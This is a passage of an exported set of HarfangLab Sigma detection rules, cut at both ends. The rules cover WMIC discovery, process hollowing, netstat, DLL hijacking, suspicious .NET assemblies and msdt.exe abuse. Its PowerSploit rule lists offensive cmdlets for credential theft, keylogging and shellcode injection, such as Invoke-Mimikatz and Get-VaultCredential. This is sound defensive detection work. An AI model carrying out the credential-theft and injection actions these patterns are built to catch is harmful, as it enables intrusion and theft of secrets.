?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*.tmp\\antivirus-info.log 2>&1'\n GrandparentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*.tmp\\papercut-hive.tmp'\n\n exclusion_dataspell:\n ParentImage|endswith: '\\bin\\dataspell64.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'JetBrains s.r.o.'\n\n exclusion_screenbeam:\n GrandparentImage: '?:\\Program Files\\ScreenBeam\\Conference\\app\\SBConfDiag.exe'\n\n exclusion_eclipse:\n ParentImage|endswith: '\\eclipse\\eclipse.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Eclipse.org Foundation, Inc.'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d4e7e23-3983-42cc-a582-3c2daece8466",
"rule_name": "Security Software Product Discovered via WMIC",
"rule_description": "Detects the discovery of the main security software product using WMIC.\nAdversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nIt is recommended to analyze WMIC's parent process to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2021-04-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1518.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d5a0c6d-0a15-4c37-83e0-d6c7548133f5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.615384Z",
"creation_date": "2026-03-23T11:45:34.615387Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.615394Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_aspnet_wp.yml",
"content": "title: Aspnet_wp.exe Sacrificial Process Spawned\nid: 3d5a0c6d-0a15-4c37-83e0-d6c7548133f5\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary aspnet_wp.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used, for instance, by the Vidar malware.\n It is recommended to investigate the parent process performing this action and the destination IP address of the aspnet_wp.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\aspnet_wp.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d5a0c6d-0a15-4c37-83e0-d6c7548133f5",
"rule_name": "Aspnet_wp.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary aspnet_wp.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used, for instance, by the Vidar malware.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the aspnet_wp.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d99b108-5ade-42df-b9d6-c4b94dea6e12",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294466Z",
"creation_date": "2026-03-23T11:45:35.294469Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294476Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/software/S0104/"
],
"name": "t1049_netstat_macos.yml",
"content": "title: Network Statistics Discovered via Netstat (macOS)\nid: 3d99b108-5ade-42df-b9d6-c4b94dea6e12\ndescription: |\n Detects the execution of the netstat command.\n Attackers may use it during the discovery phase of an attack to retrieve network connection statistics and gather information on currently active connections.\n It is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\nreferences:\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2022/11/22\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0104\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/netstat'\n CommandLine:\n - 'netstat'\n - 'netstat -?'\n - 'netstat -??'\n - 'netstat -???'\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_common_folder:\n - ProcessParentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n - ProcessParentCommandLine|startswith:\n - 'bash /Applications/*/Contents/Resources/'\n - 'bash /Applications/*/Contents/MacOS/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n\n exclusion_parent:\n - ParentImage:\n - '/Library/Application Support/LANDesk/bin/ivCSEP'\n - '/usr/libexec/wifivelocityd'\n - '/Applications/rekordbox*/rekordbox.app/Contents/MacOS/rekordbox'\n - '/usr/local/bin/node'\n 
- '/Users/*/.nvm/versions/node/v*/bin/node'\n - '/Users/*/.asdf/installs/nodejs/*/bin/node'\n - '/Users/*/.local/share/fnm/node-versions/v*/installation/bin/node'\n - '/Applications/eul.app/Contents/MacOS/eul'\n - '/Applications/AnyDesk.app/Contents/MacOS/AnyDesk'\n - '/Library/Application Support/LANDesk/bin/ldiscan'\n - '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n - '/Applications/Ivanti Secure Access.app/Contents/Plugins/JUNS/dsAccessService'\n - '/Library/SystemExtensions/????????-????-????-????-????????????/io.tailscale.ipn.macsys.network-extension.systemextension/Contents/MacOS/io.tailscale.ipn.macsys.network-extension'\n - '/Applications/Tailscale.app/Contents/PlugIns/IPNExtension.appex/Contents/MacOS/IPNExtension'\n - ParentCommandLine: '/bin/sh /System/Library/Frameworks/SystemConfiguration.framework/Versions/*Resources/get-network-info*'\n\n exclusion_grandparent:\n GrandparentImage:\n - '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n - '/Applications/rekordbox*/rekordbox.app/Contents/MacOS/rekordbox'\n - '/usr/local/bin/node'\n - '/Users/*/.nvm/versions/node/v*/bin/node'\n - '/Users/*/.asdf/installs/nodejs/*/bin/node'\n - '/Users/*/.local/share/fnm/node-versions/v*/installation/bin/node'\n - '/Applications/DDPM/DDPM.app/Contents/MacOS/DDPM'\n - '/usr/libexec/sysdiagnosed'\n - '/Library/SystemExtensions/*/com.netskope.client.Netskope-Client.NetskopeClientMacAppProxy.systemextension/Contents/MacOS/com.netskope.client.Netskope-Client.NetskopeClientMacAppProxy'\n\n exclusion_periodic_status_network:\n ParentCommandLine: '/bin/sh /etc/periodic/daily/420.status-network'\n CommandLine: 'netstat -i'\n\n exclusion_wazuh:\n Ancestors|contains:\n - '/Library/Ossec/bin/wazuh-syscheckd'\n - '|/Library/Ossec/bin/wazuh-logcollector'\n\n exclusion_ocsinventory:\n ParentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n\n exclusion_meraki:\n - GrandparentImage: 
'/Library/Application Support/Meraki/m_agent'\n # /bin/sh -c netstat -ib | grep -e \"en0\" -m 1 | awk '{print $7\" \"$10}'\n - ParentCommandLine: \"/bin/sh -c netstat -ib | grep -e \\\"en?\\\" -m 1 | awk '{print $7\\\" \\\"$10}'\"\n\n # As the parents are missing we don't know which process is doing this actions, but generate a lot of noise\n exclusion_unknown:\n ParentCommandLine:\n - \"sh -c /usr/sbin/netstat -rn -f inet | /usr/bin/egrep -e '^[0-9]+.*|^[a-f]+.*|^[A-F]+.*|^default'\"\n - \"sh -c /usr/sbin/netstat -rn -f inet? | /usr/bin/egrep -e '^[0-9]+.*|^[a-f]+.*|^[A-F]+.*|^default'\"\n - 'sh -c netstat -anv | grep [.]54???'\n - \"/bin/sh -c netstat -rn | grep UG | awk '{print $NF}'\"\n\n exclusion_glpi:\n - ParentImage: '/Applications/GLPI-Agent/bin/perl'\n - GrandparentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_delovo:\n - ParentImage: '/opt/devolo/bin/devolonetsvc'\n - GrandparentImage: '/opt/devolo/bin/devolonetsvc'\n\n exclusion_fusion_inventory:\n - ParentImage: '/opt/fusioninventory-agent/bin/perl'\n - GrandparentImage: '/opt/fusioninventory-agent/bin/perl'\n\n exclusion_fsecure:\n - GrandparentCommandLine: '/bin/bash /usr/local/f-secure/bin/orspwrapper.sh --daas2-data ./orspclient/etc --http-port 0'\n - CommandLine: 'netstat -nr'\n CurrentDirectory: '/usr/local/f-secure'\n\n exclusion_tanium:\n Ancestors|contains: '|/Library/Tanium/TaniumClient/TaniumClient'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d99b108-5ade-42df-b9d6-c4b94dea6e12",
"rule_name": "Network Statistics Discovered via Netstat (macOS)",
"rule_description": "Detects the execution of the netstat command.\nAttackers may use it during the discovery phase of an attack to retrieve network connection statistics and gather information on currently active connections.\nIt is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2022-11-22",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d9c3390-1a0c-4b77-a811-5d2057a4e979",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608065Z",
"creation_date": "2026-03-23T11:45:34.608068Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608075Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/PowerShellMafia/PowerSploit",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0194/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powersploit_script.yml",
"content": "title: Malicious PowerSploit Commandlets\nid: 3d9c3390-1a0c-4b77-a811-5d2057a4e979\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Powersploit framework.\n PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\n It is recommended to investigate the script contents to determine if the function call was part of the malicious framework or a legitimate script and if it stems from legitimate activity.\nreferences:\n - https://github.com/PowerShellMafia/PowerSploit\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0194/\ndate: 2021/06/22\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1134\n - attack.collection\n - attack.t1123\n - attack.credential_access\n - attack.t1056.001\n - attack.t1558.003\n - attack.execution\n - attack.t1047\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.005\n - attack.s0194\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerSploit\n - classification.Windows.Framework.PowerView\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Set-MacAttribute'\n - 'Invoke-DllInjection'\n - 'Invoke-Shellcode'\n - 'Invoke-WmiCommand'\n - 'Get-GPPPassword'\n - 'Get-Keystrokes'\n - 'Get-TimedScreenshot'\n - 'Get-VaultCredential'\n - 'Invoke-CredentialInjection'\n - 'Invoke-Mimikatz'\n - 'Invoke-NinjaCopy'\n - 'Invoke-TokenManipulation'\n - 'Out-Minidump'\n - 'Invoke-ReflectivePEInjection'\n - 'Invoke-DowngradeAccount'\n - 'Add-RegBackdoor'\n - 'Install-SSP'\n - 'PowerBreach'\n - 'Get-SiteListPassword'\n - 'Invoke-WScriptBypassUAC'\n - 'PowerUp'\n - 'Get-ServiceUnquoted'\n - 
'Get-ServiceFilePermission'\n - 'Get-ServicePermission'\n - 'Invoke-ServiceAbuse'\n - 'Install-ServiceBinary'\n - 'Find-DLLHijack'\n - 'Find-PathHijack'\n - 'Get-RegAlwaysInstallElevated'\n - 'Get-RegAutoLogon'\n - 'Get-VulnAutoRun'\n - 'Get-VulnSchTask'\n - 'PowerView'\n - 'Invoke-PortScan'\n - 'Invoke-ReverseDNSLookup'\n - 'Invoke-AllChecks'\n - 'Get-MicrophoneAudio'\n - 'Invoke-Kerberoast'\n\n # if ($SOFTWARENAME -match \"ShinoBOT\" -or $URL -match \"ShinoBOT\") {\n # try { '' | out-file ':::::\\windows\\sentinel\\3' -Confirm:$false -WhatIf:$false } catch {}\n # }\n # $local:counter = 0\n # foreach ($item in $($REGISTRYNAMEHOSTID, $REGISTRYNAMEPASSWORD, $IDDELIMITER, $COMMANDSDELIMITER, $HostID, $dojob)) {\n # if ($item -ne $null) { $counter += 1 }\n # };\n # if ($counter -ge 4) {\n # try { '' | out-file ':::::\\windows\\sentinel\\3' -Confirm:$false -WhatIf:$false } catch {}\n # }\n # while ($PreviousErrCount -ne $error.count) {\n # $error.remove($error[0])\n # }\n # Remove-Variable PreviousErrCount -Scope local -Confirm:$false -WhatIf:$false}} | Out-Null\n # Set-PSBreakpoint -Variable 'IDDELIMITER' -Mode write -Action { <#sentinelbreakpoints#> . {\n exclusion_sentinel_one:\n PowershellCommand|contains|all:\n - ':::::\\windows\\sentinel'\n - '<#sentinelbreakpoints#>'\n\n exclusion_techpowerup:\n PowershellCommand|contains: 'TechPowerUp.'\n\n # https://www.powershellgallery.com/packages/Carbon/2.9.2/Content/Carbon.psm1\n exclusion_carbon:\n PowershellCommand|contains: 'Set-Alias -Name ?Get-ServicePermissions? -Value ?Get-CServicePermission?'\n\n exclusion_amazon:\n PowershellCommand: 'function Invoke-WmiCommand('\n PowershellScriptPath: '?:\\Program Files\\Amazon\\AWS DMS Collector\\PowerShell\\\\*.psm1'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d9c3390-1a0c-4b77-a811-5d2057a4e979",
"rule_name": "Malicious PowerSploit Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Powersploit framework.\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\nIt is recommended to investigate the script contents to determine if the function call was part of the malicious framework or a legitimate script and if it stems from legitimate activity.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1056.001",
"attack.t1059.001",
"attack.t1123",
"attack.t1134",
"attack.t1547.005",
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3e1415cf-9a1e-48bf-9548-0d6d2af5a98f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095998Z",
"creation_date": "2026-03-23T11:45:34.096000Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096004Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_licmgr.yml",
"content": "title: DLL Hijacking via licmgr.exe\nid: 3e1415cf-9a1e-48bf-9548-0d6d2af5a98f\ndescription: |\n Detects potential Windows DLL Hijacking via licmgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'licmgr.exe'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\lrwizdll.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3e1415cf-9a1e-48bf-9548-0d6d2af5a98f",
"rule_name": "DLL Hijacking via licmgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via licmgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3e31fb72-ee20-4a45-96c7-b801ee49e65f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076559Z",
"creation_date": "2026-03-23T11:45:34.076561Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076565Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_dotnet_assembly_load_susp_pdb.yml",
"content": "title: Dotnet Assembly with Suspicious PDB Path Loaded\nid: 3e31fb72-ee20-4a45-96c7-b801ee49e65f\ndescription: |\n Detects the loading of .NET assemblies whose PDB path indicates potentially malicious activities.\n Program Database (PDB) files contain debugging information and file paths that can reveal the original development environment and intent of .NET assemblies.\n Suspicious PDB paths may include references to offensive tools, exploit frameworks, or development environments associated with malicious activities.\n It is recommended to analyze the loading process and to investigate the assembly's functionality and origin.\nreferences:\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/11/27\nmodified: 2025/06/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n AssemblyFlags: '0x0'\n AssemblyToken: 'null'\n FullyQualifiedAssemblyName|contains:\n - 'Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'\n - 'Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n ManagedPdbBuildPath|contains:\n - 'maldev'\n - 'malware'\n - 'backdoor'\n - 'keylog'\n - 'shellcode'\n - 'PrivilegeEscalation'\n - 'CVE_20'\n - 'CVE-20'\n - 'exploit'\n - 'RedTeam'\n - 'hack'\n - 'Attack'\n - 'UACbypass'\n - 'loader'\n - 'webshell'\n - 'Dropper'\n - 'grabber'\n - 'Inject'\n - 'Payload'\n - 'trojan'\n - 'ByPass'\n - 'spreader'\n - ' ' # multiple spaces\n\n # Avoid false positive with loader word used in the detection\n filter_known_word:\n # loader\n ManagedPdbBuildPath: 'uploader'\n\n filter_known_assembly:\n AssemblyName: 'easily.exploitation.sql'\n\n filter_path:\n ModuleILPath|contains: '\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3e31fb72-ee20-4a45-96c7-b801ee49e65f",
"rule_name": "Dotnet Assembly with Suspicious PDB Path Loaded",
"rule_description": "Detects the loading of .NET assemblies whose PDB path indicates potentially malicious activities.\nProgram Database (PDB) files contain debugging information and file paths that can reveal the original development environment and intent of .NET assemblies.\nSuspicious PDB paths may include references to offensive tools, exploit frameworks, or development environments associated with malicious activities.\nIt is recommended to analyze the loading process and to investigate the assembly's functionality and origin.\n",
"rule_creation_date": "2024-11-27",
"rule_modified_date": "2025-06-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3e456468-0899-4a47-967e-a1e508005da6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072530Z",
"creation_date": "2026-03-23T11:45:34.072533Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072537Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1055_suspicious_process_msdt.yml",
"content": "title: Suspicious msdt.exe Execution\nid: 3e456468-0899-4a47-967e-a1e508005da6\ndescription: |\n Detects suspicious execution patterns of msdt.exe (Microsoft Support Diagnostic Tool), a legitimate Windows troubleshooting utility.\n While normally used for system diagnostics, this binary is frequently abused by attackers, particularly Cobalt Strike, through its spawnto technique to masquerade malicious activities as legitimate troubleshooting processes.\n It is recommended to analyze any associated diagnostic packages, and terminate unauthorized instances while correlating with other Cobalt Strike indicators.\nreferences:\n - https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/04\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\msdt.exe'\n - OriginalFileName: 'msdt.exe'\n\n exclusion_legitimate_commandline:\n CommandLine|contains:\n - ' -path'\n - ' /path'\n - ' -id'\n - ' /id'\n - ' -cab'\n - ' /cab'\n - ' -dt'\n - ' /dt'\n - ' -\\?'\n - ' /\\?'\n - ' ms-msdt:-id'\n\n exclusion_known_fp_1:\n CommandLine: '?:\\Windows\\System32\\msdt.exe -sp Microsoft -elevated yes'\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n\n exclusion_known_fp_2:\n CommandLine:\n - '?:\\Windows\\System32\\msdt.exe'\n - '?:\\Windows\\SysWOW64\\msdt.exe'\n ParentImage:\n - '?:\\Windows\\System32\\sihost.exe'\n - '?:\\Windows\\explorer.exe'\n - '?:\\Program Files (x86)\\Common Files\\VAudio\\Interop.exe'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/fix-problems-in-windows-search\n 
